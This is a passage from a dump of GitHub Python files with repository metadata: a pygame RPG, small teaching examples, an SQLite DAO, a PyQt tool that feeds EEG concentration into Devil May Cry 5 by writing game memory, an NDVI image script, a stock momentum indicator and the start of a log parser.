75), (j % 6 * 150 + 145, j // 6 * 150\n + 55), 4)\n show_words(str(character_list[i.is_wear - 1].name),\n (j % 6 * 150 + 190, j // 6 * 150 + 60), font_small, GREY)\n elif type(i) == Drug:\n item_list_image = show_image(item_list_image, coord, str(i.name), j)\n elif type(i) == Material:\n '''change into upper form'''\n item_list_image = show_image(item_list_image, coord, str(i.type), j)\n show_words(i.name, (j % 6 * 150 + 180, j // 6 * 150 + 150), font, BLACK)\n j += 1\n return len(item_list_image)\n\n\ndef click_on_props():\n mouse_pos = pygame.mouse.get_pos()\n for i in range(4):\n if 100 < mouse_pos[0] < width - 100 and 50 + i * 150 < mouse_pos[1] < 200 + i * 150:\n for j in range(6):\n if 100 + j * 150 < mouse_pos[0] < 250 + j * 150:\n return i * 6 + j\n return -1\n\n\ndef translate(word):\n translator = {'name': '名称', 'attack': '攻击', 'defence': '防御', 'health': '生命', 'magic': '魔法', 'critical': '暴击',\n 'speed': '速度', 'luck': '幸运', 'level': '等级', 'num': '数量', 'enchant_time': '可附魔次数',\n 'value': '价格', 'type': '类型'}\n return translator[word]\n\n\ndef sale_obj(baggage, obj, contents):\n \"\"\"卖出物品\"\"\"\n contents['money'] += obj.value\n if Prop == type(obj):\n baggage.objects.remove(obj)\n else:\n for i in baggage.objects:\n if i.name == obj.name:\n i.num -= 1\n if i.num <= 0:\n baggage.objects.remove(i)\n baggage.amount -= 1\n break\n\n\ndef draw_character():\n pygame.draw.line(screen, GREY, (100, height / 2 - 50), (width - 100, height / 2 - 50), 4)\n pygame.draw.line(screen, BLACK, ((width - 200) / 3 + 100, 50), ((width - 200) / 3 + 100, height - 150), 4)\n pygame.draw.line(screen, BLACK, ((width - 200) / 1.5 + 105, 50), ((width - 200) / 1.5 + 105, height - 150), 4)\n show_words(character_list[0].name, ((width - 200) / 6 + 100, 100), font, BLACK)\n show_words(character_list[1].name, ((width - 200) / 2 + 100, 100), font, BLACK)\n show_words(character_list[2].name, ((width - 200) / 6 * 5 + 100, 100), font, BLACK)\n show_attr(character_list[0], ((width - 200) / 6 + 20, height / 2 - 20))\n show_attr(character_list[1], ((width - 200) / 2 + 20, height / 2 - 20))\n show_attr(character_list[2], ((width - 200) / 6 * 5 + 20, height / 2 - 20))\n for i in range(6):\n pygame.draw.rect(screen, GREY, (((width - 200) / 6 - 40 + 97 * (i % 3), 240 if i > 2 else 130), (85, 85)), 4)\n pygame.draw.rect(screen, GREY, (((width - 200) / 2 - 35 + 97 * (i % 3), 240 if i > 2 else 130), (85, 85)), 4)\n pygame.draw.rect(screen, GREY, (((width - 200) / 6 * 5 - 35 + 97 * (i % 3),\n 240 if i > 2 else 130), (85, 85)), 4)\n item_list_image = []\n k = 0\n for i in range(3):\n for j in range(6):\n if j < len(character_list[i].position):\n coord = (width - 200) / 6 - 25 + 97 * (j % 3) + 308 * i - (i // 2) * 8, 250 if j > 2 else 140\n item_list_image = show_image(item_list_image, coord, str(character_list[i].position[j].pos), k)\n show_words(str(character_list[i].position[j].name),\n ((width - 200) / 6 + 97 * (j % 3) + i * 300, 340 if j > 2 else 230),\n font_small, RED)\n k += 1\n draw_window()\n\n\ndef draw_map():\n for point in point_list:\n pygame.draw.circle(screen, YELLOW, point, 15, 4)\n\n\ndef level_choose():\n i = 0\n for point in point_list:\n if point[0] - 25 < map_choice[0] < point[0] + 25 and point[1] - 25 < map_choice[1] < point[1] + 25:\n pygame.draw.circle(screen, RED, point, 15, 4)\n return i\n i += 1\n return -1\n\n\ndef refresh_baggage(baggage, props_list, drug_list, materials_list):\n \"\"\"列表载入背包\"\"\"\n baggage.objects = props_list[:] + drug_list[:] + materials_list[:]\n baggage.amount = len(baggage.objects)\n\n\ndef get_cur_ability(fight_event):\n \"\"\"初始化出战人物\"\"\"\n with open('fileSave.json', 'r', encoding='utf-8') as file_object:\n contents = json.load(file_object)\n for j in contents['fight_event']:\n if j['num'] is fight_event:\n for i in j['enemy']:\n ch = Character(i['name'])\n ch.create_new_character(i['attack'], i['defence'], i['health'], i['magic'], i['critical'], i['speed'],\n i['luck'], 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, [])\n enemy_list.append(ch)\n for i in characters_fight_list:\n i.character_cur_ability()\n for i in enemy_list:\n i.character_cur_ability()\n\n\ndef judge_speed():\n \"\"\"速度排序\"\"\"\n speed_list = []\n for i in characters_fight_list:\n if i.cur_health > 0:\n speed_list.append(i)\n for i in enemy_list:\n if i.cur_health > 0:\n speed_list.append(i)\n for i in range(0, len(speed_list)-1):\n for j in range(i+1, len(speed_list)):\n if speed_list[i].cur_speed < speed_list[j].cur_speed:\n speed_list[i], speed_list[j] = speed_list[j], speed_list[i]\n return speed_list\n\n\ndef character_action(character1, character2):\n harm = round(0.8 * character1.cur_attack - character2.cur_defence) + round(0.2 * character1.cur_attack)\\\n if character1.cur_attack > character2.cur_defence else round(0.2 * character1.cur_attack)\n if character1.cur_critical >= random.randint(1, 100):\n print(\"暴击!!!\")\n harm = round(character1.cur_attack * 1.5) - character2.cur_defence\n if harm <= 0:\n harm = 0\n character2.cur_health -= harm\n print(character1.name + '对' + character2.name + '造成了' + str(harm) + '点伤害。')\n\n\ndef character_die(character, list):\n list.remove(character)\n\n\ndef fight_end():\n if len(characters_fight_list) is 0 or len(enemy_list) is 0:\n return True\n return False\n\n\ndef fight_fight():\n \"\"\"虚拟战斗\n 战斗主函数\"\"\"\n while fight_end() is False:\n \"\"\"判断战斗是否结束\"\"\"\n speed_list = judge_speed()\n \"\"\"刷新行动列表\"\"\"\n for i in speed_list:\n if i.cur_health > 0 and fight_end() is False:\n if i in characters_fight_list:\n if len(enemy_list) > 1:\n character = enemy_list[random.randint(0, len(enemy_list))]\n else:\n character = enemy_list[-1]\n character_action(i, character)\n \"\"\"目前只有战斗功能\"\"\"\n print(character.name + 'health' + str(character.cur_health))\n if character.cur_health <= 0:\n character_die(character, enemy_list)\n speed_list.remove(character)\n else:\n if len(characters_fight_list) > 1:\n character = characters_fight_list[random.randint(0, len(enemy_list))]\n else:\n character = characters_fight_list[-1]\n character_action(i, character)\n print(character.name + 'health' + str(character.cur_health))\n if character.cur_health <= 0:\n character_die(character, characters_fight_list)\n speed_list.remove(character)\n\n\ncontent = load_file()\nbaggage = Baggage(content['baggage'])\nis_new(content)\ncharacter_list = []\ndrug_list = []\nmaterial_list = []\nprop_list = []\nmake_lists(content, prop_list, drug_list, character_list, material_list)\nrefresh_baggage(baggage, prop_list, drug_list, material_list)\nmap_choice = [20, height - 20]\nmap_x_velocity = 0\nmap_y_velocity = 0\nflag = 0\npoint_list = [(100, 200), [200, 100], [300, 400], [500, 400]]\nlevel_choice = -1\n\nwhile True:\n screen.fill(CREAM)\n for event in pygame.event.get(): # event list\n if event.type == pygame.QUIT: # close the window\n refresh_content(content, character_list, prop_list, drug_list, material_list)\n down_file(content)\n sys.exit()\n elif event.type == pygame.KEYDOWN: # event of press the key\n if event.key == pygame.K_RIGHT:\n map_x_velocity = 2\n if event.key == pygame.K_DOWN:\n map_y_velocity = 2\n if event.key == pygame.K_LEFT:\n map_x_velocity = -2\n if event.key == pygame.K_UP:\n map_y_velocity = -2\n elif event.type == pygame.KEYUP: # event of release the key\n if event.key == pygame.K_RIGHT:\n map_x_velocity = 0\n if event.key == pygame.K_DOWN:\n map_y_velocity = 0\n if event.key == pygame.K_LEFT:\n map_x_velocity = 0\n if event.key == pygame.K_UP:\n map_y_velocity = 0\n if event.key == pygame.K_SPACE and level_choice is not -1:\n print(int(level_choice))\n characters_fight_list = character_list[:]\n enemy_list = []\n get_cur_ability(level_choice)\n fight_fight()\n print(int(level_choice))\n mouse_pos = pygame.mouse.get_pos()\n mouse_pressed = pygame.mouse.get_pressed()\n '''return tuple object, which [0] represent left key, [1] for middle, [2] for right'''\n if width - 60 < mouse_pos[0] < width and height - 60 < mouse_pos[1] < height and mouse_pressed[0] == 1:\n '''character'''\n draw_character()\n draw_window()\n while True:\n if close_window() == 1:\n break\n if (width - 120 < mouse_pos[0] < width - 60 and height - 60 < mouse_pos[1] < height and mouse_pressed[0] == 1)\\\n or flag == 1:\n \"\"\"bag\"\"\"\n show_words(\"金钱:\" + str(content['money']), (width / 2, 30), font, BLACK)\n for i in range(3):\n pygame.draw.line(screen, BLACK, (100, 200 + i * 150), (width - 100, 200 + i * 150), 4)\n for i in range(5):\n pygame.draw.line(screen, BLACK, (250 + i * 150, 50), (250 + i * 150, height - 150), 4)\n ''' put into function'''\n props_num = show_object(baggage)\n draw_window()\n flag = 0\n while True:\n if close_window() == 1:\n refresh_lists(baggage, prop_list, drug_list, material_list)\n break\n mouse_pressed = pygame.mouse.get_pressed()\n cur_word_1 = ''\n cur_word_2 = ''\n tag = 0\n if mouse_pressed[0] == 1:\n chose_num = click_on_props()\n if 0 <= chose_num < props_num:\n pygame.draw.rect(screen, CREAM, ((0, height - 145), (1100, 145)))\n word_len = 0\n obj = vars(baggage.objects[chose_num])\n for i in obj:\n if not re.findall('(^grow|^need|pos|exp|is_wear|numb)', str(i)):\n if obj[i] != 0:\n if word_len < 6:\n cur_word_1 += translate(str(i)) + ':' + str(obj[i]) + ' '\n word_len += 1\n else:\n cur_word_2 += translate(str(i)) + ':' + str(obj[i]) + ' '\n show_words(cur_word_1, (width / 2, height - 120), font, BLACK)\n show_words(cur_word_2, (width / 2, height - 70), font, BLACK)\n elif mouse_pressed[2] == 1:\n chose_num = click_on_props()\n if 0 <= chose_num < props_num:\n chose_num = click_on_props()\n if type(baggage.objects[chose_num]) == Material or type(baggage.objects[chose_num]) == Drug:\n sale_obj(baggage, baggage.objects[chose_num], content)\n refresh_lists(baggage, prop_list, drug_list, material_list)\n time.sleep(0.2)\n flag = 1\n break\n else:\n screen.fill(CREAM)\n pygame.draw.line(screen, BLACK, (100, 450), (width - 100, 450), 4)\n pygame.draw.line(screen, BLACK, ((width - 200) / 3 + 100, 50),\n ((width - 200) / 3 + 100, 650), 4)\n pygame.draw.line(screen, BLACK, ((width - 200) / 1.5 + 100, 50),\n ((width - 200) / 1.5 + 100, 650), 4)\n show_words(\"售出\", ((width - 200) / 3 - 50, 350), font, BLACK)\n screen.blit(sale_images, sale_image)\n show_words(\"强化\", (width / 2, 350), font, BLACK)\n screen.blit(strengthen_images, strengthen_image)\n show_words(\"附魔\", ((width - 200) / 1.5 + 250, 350), font, BLACK)\n screen.blit(enchant_images, enchant_image)\n show_words(\"装备于\" + str(character_list[0].name), ((width - 200) / 3 - 50, 550), font, BLACK)\n show_words(\"装备于\" + str(character_list[1].name), (width / 2, 550), font, BLACK)\n show_words(\"装备于\" + str(character_list[2].name), ((width - 200) / 1.5 + 250, 550), font, BLACK)\n draw_window()\n while True:\n mouse_pressed = pygame.mouse.get_pressed()\n if mouse_pressed[0] == 1:\n mouse_pos = pygame.mouse.get_pos()\n if 100 < mouse_pos[0] < (width - 200) / 3 + 100 and 50 < mouse_pos[1] < 450:\n sale_obj(baggage, baggage.objects[chose_num], content)\n refresh_lists(baggage, prop_list, drug_list, material_list)\n refresh_baggage(baggage, prop_list, drug_list, material_list)\n tag = 1\n break\n if (width - 200) / 3 + 100 < mouse_pos[0] < (width - 200) / 1.5 + 100 and 50 <\\\n mouse_pos[1] < 450:\n streng_status = strengthen_prop(baggage.objects[chose_num])\n pygame.draw.rect(screen, CREAM, ((0, height - 145), (1100, 145)))\n if streng_status == 1:\n show_words('强化成功!', (width / 2, height - 100), font, RED)\n elif streng_status == 0:\n show_words('强化失败...', (width / 2, height - 100), font, RED)\n elif streng_status == 2:\n show_words('你的装备已经满级了!', (width / 2, height - 100), font, RED)\n elif streng_status == 3:\n show_words('没钱强化个毛啊!需要' + str(baggage.objects[chose_num].need_exp),\n (width / 2, height - 100), font, RED)\n pygame.display.update()\n fclock.tick(fps)\n time.sleep(0.2)\n if 100 < mouse_pos[0] < (width - 200) / 3 + 100 and 450 < mouse_pos[1] < 650:\n add_prop_character(character_list[0], baggage.objects[chose_num], 1)\n tag = 1\n break\n elif (width - 200) / 3 + 100 < mouse_pos[0] < (width - 200) / 1.5 + 100 and 450 \\\n < mouse_pos[1] < 650:\n add_prop_character(character_list[1], baggage.objects[chose_num], 2)\n tag = 1\n break\n elif (width - 200) / 1.5 + 100 < mouse_pos[0] < width - 100 and 450 < mouse_pos[1] < 650:\n add_prop_character(character_list[2], baggage.objects[chose_num], 3)\n tag = 1\n break\n if close_window() == 1:\n break\n if tag == 1:\n flag = 1\n break\n pygame.display.update()\n fclock.tick(fps)\n if width - 180 < mouse_pos[0] < width - 120 and height - 60 < mouse_pos[1] < height and mouse_pressed[0] == 1:\n \"\"\"achievement\"\"\"\n draw_window()\n while True:\n if close_window() == 1:\n break\n if (map_x_velocity > 0 and map_choice[0] < width - 10) or (map_x_velocity < 0 and map_choice[0] > 10):\n map_choice[0] += map_x_velocity\n if (map_y_velocity > 0 and map_choice[1] < height - 10) or (map_y_velocity < 0 and map_choice[1] > 10):\n map_choice[1] += map_y_velocity\n pygame.draw.circle(screen, BLACK, tuple(map_choice), 10)\n screen.blit(character_images, character_image)\n screen.blit(bag_images, bag_image)\n screen.blit(achievement_images, achievement_image)\n draw_map()\n level_choice = level_choose()\n pygame.display.update()\n fclock.tick(fps)\n","repo_name":"DAZHAdazha/No-names-land","sub_path":"无名之地.py","file_name":"无名之地.py","file_ext":"py","file_size_in_byte":40390,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"2076863614","text":"#プライベート変数\n\nclass Human:\n\n #プライベート変数\n __human = 'human'\n\n def __init__(self,name,age):\n self.__name = name\n self.__age = age\n\n def print_msg(self):\n print('name = {},age = {},__human = {}'.format(self.__name,self.__age,self.__human))\n\nhuman = Human('taro',20)\n#無理やりプライベート変数にアクセスする方法\nprint(human._Human__name)\n\nprint(human.print_msg())\n","repo_name":"takicoYuki/pythonDesignPattern","sub_path":"myproject/class/base10.py","file_name":"base10.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74574242011","text":"import inspect\n\n\ndef orm(cursor, dto_type):\n # the following line retrieve the argument names of the constructor\n args = inspect.getargspec(dto_type.__init__).args\n\n # the first argument of the constructor will be 'self', it does not correspond\n # to any database field, so we can ignore it.\n args = args[1:]\n\n # gets the names of the columns returned in the cursor\n col_names = [column[0] for column in cursor.description]\n\n # map them into the position of the corresponding constructor argument\n col_mapping = [col_names.index(arg) for arg in args]\n return [row_map(row, col_mapping, dto_type) for row in cursor.fetchall()]\n\n\ndef row_map(row, col_mapping, dto_type):\n ctor_args = [row[idx] for idx in col_mapping]\n return dto_type(*ctor_args)\n\n\n# we can use our method above in order to start writing a generic Dao\n# note that this class is not complete and we will add methods to it next\nclass Dao(object):\n def __init__(self, dto_type, conn):\n self._conn = conn\n self._dto_type = dto_type\n\n # dto_type is a class, its __name__ field contains a string representing the name of the class.\n self._table_name = dto_type.__name__.lower() + 's'\n\n def insert(self, dto_instance):\n ins_dict = vars(dto_instance)\n column_names = ','.join(ins_dict.keys())\n params = ins_dict.values()\n qmarks = ','.join(['?'] * len(ins_dict))\n stmt = 'INSERT INTO {} ({}) VALUES ({})' \\\n .format(self._table_name, column_names, qmarks)\n self._conn.execute(stmt, tuple(params))\n\n def update(self, dto_instance):\n ins_dict = vars(dto_instance)\n # for key, value in ins_dict.items():\n # value.replace(\":\", '=')\n # shitty code\n if ins_dict.get('id') is not None:\n pk = 'id'\n pkVal = '{}'.format(ins_dict.get(pk))\n else:\n pk = 'grade'\n pkVal = '\\'{}\\''.format(ins_dict.get(pk))\n\n column_names = '=?,'.join(ins_dict.keys())\n column_names += '=?'\n params = ins_dict.values()\n # qmarks = ','.join(['?'] * len(ins_dict))\n stmt = 'UPDATE {} SET {} WHERE {} = {}' \\\n .format(self._table_name, column_names, pk, pkVal)\n self._conn.execute(stmt, tuple(params))\n\n # delete\n def delete(self, keyvals):\n column_names = keyvals.keys()\n params = keyvals.values()\n stmt = 'DELETE FROM {} WHERE {}' \\\n .format(self._table_name, ' AND '.join([col + '=?' for col in column_names]))\n self._conn.execute(stmt, tuple(params))\n\n # find all\n def find_all(self):\n c = self._conn.cursor()\n c.execute('SELECT * FROM {}'.format(self._table_name))\n return orm(c, self._dto_type)\n\n # find by specific attributes\n def find(self, **keyvals):\n column_names = keyvals.keys()\n params = keyvals.values()\n\n stmt = 'SELECT * FROM {} WHERE {}' \\\n .format(self._table_name, ' AND '.join([col + '=?' for col in column_names]))\n\n c = self._conn.cursor()\n c.execute(stmt, tuple(params))\n return orm(c, self._dto_type)\n","repo_name":"y0natancohen/spl4","sub_path":"dbtools.py","file_name":"dbtools.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37542934491","text":"from flask import Flask, request, jsonify, render_template\nfrom integrator import data_converter\n\napp = Flask(__name__)\n\n@app.route('/main', methods=['POST'])\ndef main():\n data = request.json\n input_data = data.get('inputData', {})\n output_data = data_converter(input_data)\n\n return jsonify(output_data)\n\n\n@app.route('/')\ndef index():\n return render_template('main.html')\n\n\n\n\nif __name__ == '__main__':\n app.run(debug=True, port=5000)","repo_name":"szalecki-a/Krasowskis_calculator","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28711683313","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\nclass Solution:\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n head = ListNode()\n current = head\n while l1 or l2 :\n if l1 and l2 :\n if l1.val > l2.val :\n current.next = ListNode(l2.val)\n current = current.next\n l2 = l2.next\n else :\n current.next = ListNode(l1.val)\n current = current.next\n l1 = l1.next\n else :\n c = l1 if l1 else l2\n current.next = c\n break\n return head.next","repo_name":"sbyeol3/Algorithm-Study","sub_path":"LeetCode/Q1-Q500/Q21.py","file_name":"Q21.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"34819903975","text":"# 재귀를 이용한 DFS\ndef recursive_dfs(v, discovered=[]):\n discovered.append(v)\n\n for x in graph[v]:\n if x not in discovered:\n recursive_dfs(x, discovered)\n\n return discovered\n\ndef iterative_dfs(v, discovered=[]):\n stack = [v]\n\n while stack:\n x = stack.pop()\n if x not in discovered:\n discovered.append(x)\n for value in graph[x]:\n stack.append(value)\n\n return discovered\n\ngraph = {\n 1: [2, 3, 4],\n 2: [5],\n 3: [5],\n 4: [],\n 5: [6, 7],\n 6: [],\n 7: [3]\n}\n\nprint(recursive_dfs(1))\nprint(iterative_dfs(1))","repo_name":"Park-min-hyoung/PAI","sub_path":"그래프/DFS.py","file_name":"DFS.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35614368756","text":"from PyQt5 import QtWidgets as qtw\nfrom PyQt5 import QtGui as qtg\nfrom PyQt5 import QtCore as qtc\nfrom PyQt5 import QtChart as qtch\n\nfrom ReadWriteMem import ReadWriteMemory\n\nfrom designer.dmc_mod_from import Ui_DmcEegModForm\n\n\nclass DMCMod(qtw.QMainWindow):\n\n def __init__(self):\n super().__init__()\n\n # Window Initialization\n self.setWindowTitle('DMC5 EEG Concentration Mod')\n central_wdg = qtw.QWidget()\n self.setCentralWidget(central_wdg)\n self.mod_form = Ui_DmcEegModForm()\n self.mod_form.setupUi(central_wdg)\n self.status = qtw.QStatusBar()\n self.setStatusBar(self.status)\n\n self.is_connected = False\n self.is_injecting = False\n self.current_eeg_concentration = 0.6\n\n # Read Write Memory params\n self.rwm = ReadWriteMemory()\n self.process = None\n self.concentration_ptr = None\n\n # Buttons Trigger\n self.mod_form.connectBtn.clicked.connect(self.connect)\n self.mod_form.setValBtn.clicked.connect(self.form_set_value)\n self.mod_form.startBtn.clicked.connect(self.execute_injection)\n\n self.concentration_update_value = 0\n\n # Timers\n self.value_update_timer = qtc.QTimer()\n self.value_update_timer.timeout.connect(self.update_value)\n self.injection_timer = qtc.QTimer()\n self.injection_timer.timeout.connect(self.inject_value)\n\n def inject_value(self):\n # TODO: check if in combat\n self.write_dmc_concentration(self.concentration_update_value)\n\n def update_value(self):\n print('update dmc5')\n # calculate update value\n dmc_concentration = self.read_dmc_concentration()\n update_value = self.current_eeg_concentration - self.mod_form.thrSpinBox.value()\n if update_value > 0:\n update_value *= self.mod_form.addSpinBox.value()\n else:\n update_value *= self.mod_form.subSpinBox.value()\n\n next_concentration_value = dmc_concentration + update_value\n if next_concentration_value > 300:\n next_concentration_value = 300\n elif next_concentration_value < 0:\n next_concentration_value = 0\n\n # update status values\n self.mod_form.concentrationLabel.setText(str(self.current_eeg_concentration))\n self.mod_form.updateLabel.setText(str(update_value))\n self.mod_form.gameLabel.setText(str(dmc_concentration))\n self.mod_form.nextGameLabel.setText(str(next_concentration_value))\n\n # update game value\n self.concentration_update_value = next_concentration_value\n\n\n def execute_injection(self):\n if not self.is_connected:\n print('not connected to game')\n return\n if not self.is_injecting:\n print('start inject')\n update_interval = self.mod_form.valUpdateIntervalSpinBox.value()\n inject_interval = self.mod_form.injectIntervalSpinBox.value()\n self.value_update_timer.start(update_interval)\n self.injection_timer.start(inject_interval)\n self.mod_form.startBtn.setText('Stop Injection')\n self.mod_form.connectBtn.setDisabled(True)\n self.is_injecting = True\n else:\n self.value_update_timer.stop()\n self.injection_timer.stop()\n self.mod_form.connectBtn.setDisabled(False)\n self.mod_form.startBtn.setText('Start Injection')\n self.is_injecting = False\n\n def form_set_value(self):\n val = self.mod_form.valSpinBox.value()\n self.concentration_update_value = val\n if self.is_connected:\n self.write_dmc_concentration(val)\n # update status values\n self.mod_form.concentrationLabel.setText(str(self.current_eeg_concentration))\n self.mod_form.updateLabel.setText(str(0))\n self.mod_form.gameLabel.setText(str(val))\n self.mod_form.nextGameLabel.setText(str(val))\n\n # Base Methods\n def connect(self):\n if not self.is_connected:\n self.process = self.rwm.get_process_by_name('DevilMayCry5.exe')\n self.process.open()\n\n # Get concentration pointer\n base_offset = 0X7E61B90\n module_addr = int(str(self.process.base_addr), 0) + int(str(base_offset), 0)\n self.concentration_ptr = self.process.get_pointer(lp_base_address=module_addr, offsets=[0x78, 0x1B50])\n\n # TODO: Get in combat ptr\n self.is_connected = True\n self.mod_form.connectBtn.setText('Disconnect')\n print('connection to dmc5')\n else:\n self.process.close()\n self.is_connected = False\n self.mod_form.connectBtn.setText('Connect')\n print('disconnect from dmc5')\n\n def read_dmc_concentration(self):\n con_val = self.process.read_float(self.concentration_ptr)\n print('Read concentration:', con_val)\n return con_val\n\n def write_dmc_concentration(self, val):\n state = self.process.write(self.concentration_ptr, val)\n print('write concentration state:', state)\n\n def closeEvent(self, event):\n if self.is_connected:\n self.process.close()\n self.is_connected = False\n","repo_name":"aryanakr/open-sourece-python-EEG-handling-software","sub_path":"dmc_mod.py","file_name":"dmc_mod.py","file_ext":"py","file_size_in_byte":5258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8168599952","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Sep 20 10:37:45 2021\r\n\r\n@author: cosmi\r\n\"\"\"\r\n\r\n\"\"\"\r\nDenoised Vegetation Index Mapping program using DJI Mavic 2 Pro\r\nJPEG 16-bit combo images taken using InfraBlue Filter\r\n%(c)-J. Campbell MuonRay Enterprises 2021\r\n% creative commons For non-profit use only\r\nThis Python script was created using the Spyder Editor\r\n\"\"\"\r\n\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\n\r\nfrom PIL import Image\r\nimport pylab\r\nimport rof\r\n\r\nfrom scipy import misc\r\nimport imageio\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt # For image viewing\r\n\r\n#!/usr/bin/python\r\nimport os\r\nimport getopt\r\nimport sys\r\n\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import colors\r\nfrom matplotlib import ticker\r\nfrom matplotlib.colors import LinearSegmentedColormap\r\n\r\n\r\n\r\n#a nice selection of grayscale colour palettes\r\ncols1 = ['blue', 'green', 'yellow', 'red']\r\ncols2 = ['gray', 'gray', 'red', 'yellow', 'green']\r\ncols3 = ['gray', 'blue', 'green', 'yellow', 'red']\r\n\r\ncols4 = ['black', 'gray', 'blue', 'green', 'yellow', 'red']\r\n\r\ndef create_colormap(args):\r\n return LinearSegmentedColormap.from_list(name='custom1', colors=cols3)\r\n\r\n#colour bar to match grayscale units\r\ndef create_colorbar(fig, image):\r\n position = fig.add_axes([0.125, 0.19, 0.2, 0.05])\r\n norm = colors.Normalize(vmin=-1., vmax=1.)\r\n cbar = plt.colorbar(image,\r\n cax=position,\r\n orientation='horizontal',\r\n norm=norm)\r\n cbar.ax.tick_params(labelsize=6)\r\n tick_locator = ticker.MaxNLocator(nbins=3)\r\n cbar.locator = tick_locator\r\n cbar.update_ticks()\r\n cbar.set_label(\"NDVI\", fontsize=10, x=0.5, y=0.5, labelpad=-25)\r\n\r\n\r\n\r\nfor infile in os.listdir(\"./\"):\r\n print( \"file : \" + infile)\r\n if infile[-3:] == \"jpg\" or infile[-3:] == \"JPG\" :\r\n # print \"is tif or DNG (RAW)\"\r\n outfile = infile[:-3] + \"jpg\"\r\n rgb = misc.imread(infile)\r\n \r\n \r\n print( \"new filename : \" + outfile)\r\n # Extract Red, Green and Blue channels and save as separate files\r\n \r\n\r\n R = rgb[:,:,0]\r\n G = rgb[:,:,1]\r\n B = rgb[:,:,2]\r\n \r\n # Get the red band from the rgb image, and open it as a numpy matrix\r\n#NIR = image[:, :, 0]\r\n#ir = np.asarray(NIR, float)\r\n \r\n ir = (R).astype('float')\r\n \r\n# Get one of the IR image bands (all bands should be same)\r\n#blue = image[:, :, 2]\r\n\r\n#r = np.asarray(blue, float)\r\n \r\n r = (B).astype('float')\r\n \r\n #denoise\r\n \r\n denoised_ir_channel = ir\r\n \r\n \r\n U,T = rof.denoise(denoised_ir_channel,denoised_ir_channel)\r\n \r\n #pylab.figure()\r\n #pylab.gray()\r\n #pylab.imshow(U)\r\n #pylab.axis('equal')\r\n #pylab.axis('off')\r\n #pylab.show()\r\n\r\n\r\n# Create a numpy matrix of zeros to hold the calculated NDVI values for each pixel\r\n # The NDVI image will be the same size as the input image\r\n\r\n \r\n ndvi = np.zeros(r.size) \r\n \r\n# Calculate NDVI\r\n \r\n \r\n ndvi = np.true_divide(np.subtract(U, r), np.add(U, r))\r\n fig, ax = plt.subplots()\r\n\r\n image = ax.imshow(ndvi, cmap=create_colormap(colors))\r\n plt.axis('off')\r\n #Lock or Unlock Key Bar Here for Mapping/Sampling/Showcasing:\r\n #create_colorbar(fig, image)\r\n extent = ax.get_window_extent().transformed(fig.dpi_scale_trans.inverted())\r\n #imageio.imsave(outfile, ndvi)\r\n fig.savefig(outfile, dpi=600, transparent=True, bbox_inches=extent, pad_inches=0)\r\n\r\n # plt.show()\r\n \r\n \r\n# rgb = raw.postprocess()\r\n\r\n # plt.show()","repo_name":"MuonRay/Image_Denoising_with_ROF_algorithm","sub_path":"ndvi_denoise_batch.py","file_name":"ndvi_denoise_batch.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"24379849888","text":"## Momentum indicator compares current price with previous \n# price from selected number of periods ago.\n\n#%%\nimport pandas as pd\nfrom pandas_datareader import data\nimport matplotlib.pyplot as plt\n\n\nstart_date = '2014-01-01'\nend_date = '2018-01-01'\n\nSRC_DATA_FILENAME = 'goog_data.pkl'\n\ntry:\n goog_data2 = pd.read_pickle(SRC_DATA_FILENAME)\nexcept FileNotFoundError:\n goog_data2 = data.DataReader('GOOG', start_date, end_date)\n goog_data2.to_pickle(SRC_DATA_FILENAME)\n\ngoog_data = goog_data2.tail(620) \nclose = goog_data['Close']\n\ntime_period = 20\nhistory = []\nmom_values = []\n\nfor close_price in close:\n history.append(close_price)\n if len(history) > time_period:\n del (history[0])\n \n mom = close_price - history[0]\n mom_values.append(mom)\n \ngoog_data = goog_data.assign(ClosePrice=pd.Series(close, index=goog_data.index))\ngoog_data = goog_data.assign(MomentumFromPrice20DaysAgo=pd.Series(mom_values, index=goog_data.index))\n\nclose_price = goog_data['ClosePrice']\nmom = goog_data['MomentumFromPrice20DaysAgo']\n\nfig = plt.figure()\nax1 = fig.add_subplot(211, ylabel='Google price in $')\nclose_price.plot(ax=ax1, color='g', lw=2, legend=True)\nax2 = fig.add_subplot(212, ylabel='Momentum in $')\nmom.plot(ax=ax2, color='b', lw=2, legend=True)\nplt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# %%\n","repo_name":"agbleze/python_algotrade","sub_path":"mom.py","file_name":"mom.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42243747327","text":"#!/usr/bin/python2\n\nimport sys\nimport argparse\nimport pexpect\nimport select\nimport re\nimport smtplib\nimport os\nimport time\nimport smtp_credentials\n\nfrom email.mime.text import MIMEText\n\n#FIXME: Known bug: last line not seen\n\nparser = argparse.ArgumentParser(description='Log parser')\n\nparser.add_argument('FILE', help='path to the log to parse')\nparser.add_argument('RELAY', type=int, help=\"relay port associated to the board whose log is being parsed\")\nparser.add_argument('RELAY_IP', help=\"IP address of the 